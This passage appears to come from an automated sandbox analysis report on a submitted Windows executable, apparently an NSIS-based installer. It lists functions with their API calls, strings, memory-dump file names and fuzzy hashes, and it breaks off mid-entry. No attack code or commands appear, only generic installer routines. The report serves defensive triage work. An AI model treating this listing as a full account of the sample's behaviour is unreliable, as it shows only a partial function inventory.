Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

\, xrefs: 0040677A
UXTHEME, xrefs: 0040675B
%s%S.dll, xrefs: 0040679E

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

verifying installer: %d%%, xrefs: 00402E3A
unpacking data: %d%%, xrefs: 00402E33, 00402E43

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 00404C9F
%u.%u%s%s, xrefs: 00404C97

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,761336C0,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
